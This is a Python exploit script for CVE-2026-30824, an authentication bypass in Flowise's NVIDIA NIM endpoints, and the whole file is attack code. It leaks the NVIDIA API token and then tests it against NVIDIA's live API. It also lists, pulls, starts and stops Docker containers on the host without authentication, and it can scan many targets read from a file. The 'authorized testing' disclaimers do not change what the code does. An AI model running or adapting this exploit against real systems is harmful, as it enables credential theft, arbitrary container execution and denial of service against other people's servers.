5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2026-30824.py PY
#!/usr/bin/env python3
"""
CVE-2026-30824 — Flowise NVIDIA NIM Authentication Bypass
Exploit for authorized penetration testing only.

Affects: Flowise < 3.0.13
CVSS: 9.8 (Critical)
CWE-306: Missing Authentication for Critical Function

The /api/v1/nvidia-nim/* path is whitelisted in the global auth middleware,
allowing unauthenticated access to container management and token generation.
"""

import requests
import json
import argparse
import sys
import time
from urllib.parse import urljoin

# ANSI color codes
GREEN = '\033[92m'
RED = '\033[91m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
RESET = '\033[0m'
BOLD = '\033[1m'


class FlowiseAuthBypass:
    """Exploit for CVE-2026-30824 — Flowise NVIDIA NIM Auth Bypass."""

    def __init__(self, target: str, verify_ssl: bool = False, timeout: int = 15):
        self.target = target.rstrip("/")
        self.verify_ssl = verify_ssl
        self.timeout = timeout
        self.session = requests.Session()
        self.session.verify = verify_ssl

    def _request(self, method: str, path: str, data: dict = None, headers: dict = None):
        """Send an unauthenticated request to an NVIDIA NIM endpoint."""
        url = urljoin(self.target, path)
        req_headers = {"Content-Type": "application/json"}
        if headers:
            req_headers.update(headers)

        try:
            if method.upper() == "GET":
                resp = self.session.get(url, headers=req_headers, timeout=self.timeout)
            else:
                resp = self.session.post(url, headers=req_headers, json=data, timeout=self.timeout)
            
            # Debug: print endpoint info if response is HTML
            if "<!doctype html" in resp.text.lower() or "<html" in resp.text.lower():
                print(f"{YELLOW}[!] Warning: Got HTML response from {path}{RESET}")
                print(f"{YELLOW}    This endpoint may not be an API endpoint{RESET}")
            
            return resp
        except requests.exceptions.RequestException as e:
            return {"error": str(e), "status": 0}

    def check_vulnerable(self) -> bool:
        """
        Determine if the target is vulnerable by probing /get-token.
        A vulnerable instance will return an accessible endpoint (200, 400, 500 with response).
        A patched instance will return 401 Unauthorized.
        """
        resp = self._request("GET", "/api/v1/nvidia-nim/get-token")

        if isinstance(resp, dict) and resp.get("error"):
            print(f"{RED}[-] Connection error: {resp['error']}{RESET}")
            return False

        if resp.status_code == 401:
            print(f"{YELLOW}[-] Target returns 401 — likely patched (>= 3.0.13){RESET}")
            return False
        if resp.status_code == 404:
            print(f"{YELLOW}[-] Endpoint not found — target may not be Flowise{RESET}")
            return False
        
        # 5xx errors (502, 503, etc.) indicate server issues, not vulnerability
        if resp.status_code >= 500:
            print(f"{YELLOW}[-] Server error (HTTP {resp.status_code}) — target may be down or misconfigured{RESET}")
            return False
        
        # Vulnerable: responds with accessible endpoint (2xx, 3xx, or application-level errors like 400)
        if resp.status_code < 500:
            print(f"{GREEN}{BOLD}[+] Target appears VULNERABLE (HTTP {resp.status_code}){RESET}")
            print(f"    Response: {resp.text[:300]}")
            return True
        
        return False

    def get_token(self):
        """
        Leak the NVIDIA API token.
        GET /api/v1/nvidia-nim/get-token
        """
        print("[*] Attempting to leak NVIDIA API token...")
        resp = self._request("GET", "/api/v1/nvidia-nim/get-token")

        if isinstance(resp, dict) and resp.get("error"):
            print(f"[-] Error: {resp['error']}")
            return None

        # Check if we got HTML instead of JSON (endpoint may be wrong)
        if "<!doctype html" in resp.text.lower() or "<html" in resp.text.lower():
            print(f"{RED}[-] Got HTML response instead of JSON. Endpoint may not be accessible or vulnerability is patched.{RESET}")
            return None

        if resp.status_code == 200:
            try:
                data = resp.json()
                token = data.get("access_token")
                print(f"{GREEN}[+] NVIDIA API Token: {token}{RESET}")
                print(f"[+] Token Type: {data.get('token_type')}")
                print(f"[+] Expires In: {data.get('expires_in')}s")
                return token
            except json.JSONDecodeError:
                print(f"[+] Raw response: {resp.text[:500]}")
                return resp.text
        else:
            print(f"[-] Failed. HTTP {resp.status_code}: {resp.text[:300]}")
            return None

    def list_running_containers(self):
        """List running NIM containers. GET /api/v1/nvidia-nim/list-running-containers"""
        print("[*] Listing running containers...")
        resp = self._request("GET", "/api/v1/nvidia-nim/list-running-containers")

        if isinstance(resp, dict) and resp.get("error"):
            print(f"[-] Error: {resp['error']}")
            return None

        # Check if we got HTML instead of JSON
        if "<!doctype html" in resp.text.lower() or "<html" in resp.text.lower():
            print(f"{RED}[-] Got HTML response instead of JSON{RESET}")
            return None

        print(f"[+] HTTP {resp.status_code}")
        try:
            data = resp.json()
            print(json.dumps(data, indent=2))
            return data
        except json.JSONDecodeError:
            print(resp.text[:500])
            return resp.text

    def get_container(self, container_id: str):
        """Get container details. POST /api/v1/nvidia-nim/get-container"""
        print(f"[*] Getting container details: {container_id}")
        resp = self._request("POST", "/api/v1/nvidia-nim/get-container",
                            {"containerId": container_id})

        if isinstance(resp, dict) and resp.get("error"):
            print(f"[-] Error: {resp['error']}")
            return None

        print(f"[+] HTTP {resp.status_code}")
        try:
            data = resp.json()
            print(json.dumps(data, indent=2))
            return data
        except json.JSONDecodeError:
            print(resp.text[:500])
            return resp.text

    def get_image(self, image_id: str):
        """Get image details. POST /api/v1/nvidia-nim/get-image"""
        print(f"[*] Getting image details: {image_id}")
        resp = self._request("POST", "/api/v1/nvidia-nim/get-image",
                            {"imageId": image_id})

        if isinstance(resp, dict) and resp.get("error"):
            print(f"[-] Error: {resp['error']}")
            return None

        print(f"[+] HTTP {resp.status_code}")
        try:
            data = resp.json()
            print(json.dumps(data, indent=2))
            return data
        except json.JSONDecodeError:
            print(resp.text[:500])
            return resp.text

    def pull_image(self, image_tag: str, api_key: str = "test"):
        """
        Pull an arbitrary Docker image onto the host.
        POST /api/v1/nvidia-nim/pull-image
        This can be used to pull a malicious container image.
        """
        print(f"[*] Pulling image: {image_tag}")
        resp = self._request("POST", "/api/v1/nvidia-nim/pull-image",
                            {"imageTag": image_tag, "apiKey": api_key})

        if isinstance(resp, dict) and resp.get("error"):
            print(f"[-] Error: {resp['error']}")
            return None

        print(f"[+] HTTP {resp.status_code}")
        try:
            data = resp.json()
            print(json.dumps(data, indent=2))
            return data
        except json.JSONDecodeError:
            print(resp.text[:500])
            return resp.text

    def start_container(self, image_tag: str, container_name: str = None,
                        gpus: str = "all", env: dict = None):
        """
        Start an arbitrary container.
        POST /api/v1/nvidia-nim/start-container

        This is the most dangerous endpoint — can launch arbitrary Docker containers
        with GPU access on the host.
        """
        payload = {"imageTag": image_tag}
        if container_name:
            payload["containerName"] = container_name
        if gpus:
            payload["gpus"] = gpus
        if env:
            payload["env"] = env

        print(f"[*] Starting container from image: {image_tag}")
        resp = self._request("POST", "/api/v1/nvidia-nim/start-container", payload)

        if isinstance(resp, dict) and resp.get("error"):
            print(f"[-] Error: {resp['error']}")
            return None

        print(f"[+] HTTP {resp.status_code}")
        try:
            data = resp.json()
            print(json.dumps(data, indent=2))
            return data
        except json.JSONDecodeError:
            print(resp.text[:500])
            return resp.text

    def stop_container(self, container_id: str):
        """
        Stop a running container (DoS).
        POST /api/v1/nvidia-nim/stop-container
        """
        print(f"[*] Stopping container: {container_id}")
        resp = self._request("POST", "/api/v1/nvidia-nim/stop-container",
                            {"containerId": container_id})

        if isinstance(resp, dict) and resp.get("error"):
            print(f"[-] Error: {resp['error']}")
            return None

        print(f"[+] HTTP {resp.status_code}")
        try:
            data = resp.json()
            print(json.dumps(data, indent=2))
            return data
        except json.JSONDecodeError:
            print(resp.text[:500])
            return resp.text

    def preload(self):
        """Trigger resource consumption. GET /api/v1/nvidia-nim/preload"""
        print("[*] Triggering preload...")
        resp = self._request("GET", "/api/v1/nvidia-nim/preload")

        if isinstance(resp, dict) and resp.get("error"):
            print(f"[-] Error: {resp['error']}")
            return None

        print(f"[+] HTTP {resp.status_code}")
        print(resp.text[:500])
        return resp.text

    def validate_token_against_nvidia(self, token: str):
        """
        Validate the leaked token against NVIDIA's actual API
        to demonstrate the full blast radius.
        """
        print("[*] Validating token against NVIDIA API...")
        headers = {"Authorization": f"Bearer {token}"}
        try:
            resp = requests.get(
                "https://integrate.api.nvidia.com/v1/models",
                headers=headers, timeout=10
            )
            if resp.status_code == 200:
                data = resp.json()
                models = data.get("data", [])
                print(f"[+] Token VALID! Access to {len(models)} NVIDIA NIM models.")
                for m in models[:5]:
                    print(f"    - {m.get('id')}")
                return True
            else:
                print(f"[-] Token rejected by NVIDIA. HTTP {resp.status_code}")
                return False
        except requests.exceptions.RequestException as e:
            print(f"[-] Could not reach NVIDIA API: {e}")
            return False


def main():
    parser = argparse.ArgumentParser(
        description="CVE-2026-30824 — Flowise NVIDIA NIM Authentication Bypass Exploit",
        epilog="Authorized security testing only."
    )
    parser.add_argument("-t", "--target",
                        help="Target URL (e.g., http://192.168.1.100:3000)")
    parser.add_argument("-f", "--targets-file",
                        help="File with list of targets (one per line)")
    parser.add_argument("--check", action="store_true",
                        help="Only check if target is vulnerable")
    parser.add_argument("--scan-only", action="store_true",
                        help="Scan targets for vulnerability without prompts (useful for bulk scanning)")
    parser.add_argument("--get-token", action="store_true",
                        help="Leak NVIDIA API token")
    parser.add_argument("--validate-token", metavar="TOKEN",
                        help="Validate a leaked token against NVIDIA API")
    parser.add_argument("--list-containers", action="store_true",
                        help="List running containers")
    parser.add_argument("--get-container", metavar="CONTAINER_ID",
                        help="Get container details")
    parser.add_argument("--get-image", metavar="IMAGE_ID",
                        help="Get image details")
    parser.add_argument("--pull-image", metavar="IMAGE_TAG",
                        help="Pull a Docker image (e.g., nvcr.io/nvidia/nim:latest)")
    parser.add_argument("--start-container", metavar="IMAGE_TAG",
                        help="Start a container from an image tag")
    parser.add_argument("--container-name", default=None,
                        help="Name for the started container")
    parser.add_argument("--stop-container", metavar="CONTAINER_ID",
                        help="Stop a running container")
    parser.add_argument("--preload", action="store_true",
                        help="Trigger preload endpoint")
    parser.add_argument("--all", action="store_true",
                        help="Run all reconnaissance checks")
    parser.add_argument("--timeout", type=int, default=15,
                        help="Request timeout in seconds")
    parser.add_argument("--debug", action="store_true",
                        help="Show request details and raw responses")

    args = parser.parse_args()

    if not args.target and not args.targets_file:
        parser.print_help()
        sys.exit(1)

    targets = []
    if args.target:
        targets = [args.target]
    elif args.targets_file:
        try:
            with open(args.targets_file, 'r') as f:
                targets = [line.strip() for line in f if line.strip()]
        except IOError as e:
            print(f"[-] Error reading targets file: {e}")
            sys.exit(1)

    if not targets:
        print("[-] No targets provided")
        sys.exit(1)

    print("=" * 60)
    print("  CVE-2026-30824 — Flowise NVIDIA NIM Auth Bypass")
    print("  Authorized Penetration Testing Tool")
    print("=" * 60)
    print(f"\n[*] Processing {len(targets)} target(s)\n")

    vulnerable_targets = []
    patched_targets = []
    error_targets = []

    for target_idx, target in enumerate(targets, 1):
        if not (args.scan_only or args.check):
            print(f"\n{'='*60}")
        print(f"[*] Target {target_idx}/{len(targets)}: {target}")
        if not (args.scan_only or args.check):
            print(f"{'='*60}\n")

        exploit = FlowiseAuthBypass(target, verify_ssl=False, timeout=args.timeout)

        is_vulnerable = exploit.check_vulnerable()
        if not is_vulnerable:
            if args.scan_only or args.check:
                patched_targets.append(target)
            else:
                # Try the check anyways — it may still work
                if len(targets) == 1:  # Only ask for confirmation if single target
                    response = input("\n[?] Continue anyway? (y/N): ").strip().lower()
                    if response != "y":
                        continue
                else:
                    print("[-] Skipping this target")
                    continue
        else:
            vulnerable_targets.append(target)

        # Exit early for scan-only or check modes
        if args.scan_only or args.check:
            continue

        print()

        # Single-action modes
        if args.check:
            print("[*] Check complete.")
            continue

        if args.validate_token:
            exploit.validate_token_against_nvidia(args.validate_token)
            continue

        if args.get_token:
            token = exploit.get_token()
            if token and not args.no_ssl_verify:
                if len(targets) == 1:
                    link = input("\n[?] Validate token against NVIDIA API? (y/N): ").strip().lower()
                    if link == "y":
                        exploit.validate_token_against_nvidia(token)
            continue

        if args.list_containers:
            exploit.list_running_containers()
            continue

        if args.get_container:
            exploit.get_container(args.get_container)
            continue

        if args.get_image:
            exploit.get_image(args.get_image)
            continue

        if args.pull_image:
            exploit.pull_image(args.pull_image)
            continue

        if args.start_container:
            exploit.start_container(args.start_container, args.container_name)
            continue

        if args.stop_container:
            exploit.stop_container(args.stop_container)
            continue

        if args.preload:
            exploit.preload()
            continue

        # --all mode: run comprehensive recon
        if args.all or not any([args.check, args.get_token, args.list_containers,
                                args.get_container, args.get_image, args.pull_image,
                                args.start_container, args.stop_container, args.preload]):
            print("[*] Running full reconnaissance...\n")

            # 1. Leak token
            token = exploit.get_token()
            print()

            # 2. List containers
            exploit.list_running_containers()
            print()

            # 3. Preload
            exploit.preload()
            print()

            # If we got a token, validate it
            if token:
                print("[*] Token obtained. Attempting NVIDIA API validation...")
                exploit.validate_token_against_nvidia(token)

            print("\n[*] Full reconnaissance complete for this target.")

    print(f"\n{'='*60}")
    print(f"{BOLD}[*] Scan Summary{RESET}")
    print(f"{'='*60}")
    print(f"{GREEN}[+] VULNERABLE: {len(vulnerable_targets)}{RESET}")
    if vulnerable_targets:
        for target in vulnerable_targets:
            print(f"{GREEN}    ✓ {target}{RESET}")
    print(f"{YELLOW}[-] PATCHED: {len(patched_targets)}{RESET}")
    if patched_targets:
        for target in patched_targets:
            print(f"{YELLOW}    ✗ {target}{RESET}")
    print(f"{RED}[!] ERRORS: {len(error_targets)}{RESET}")
    if error_targets:
        for target in error_targets:
            print(f"    ⚠ {target}")
    print(f"{'='*60}\n")


if __name__ == "__main__":
    main()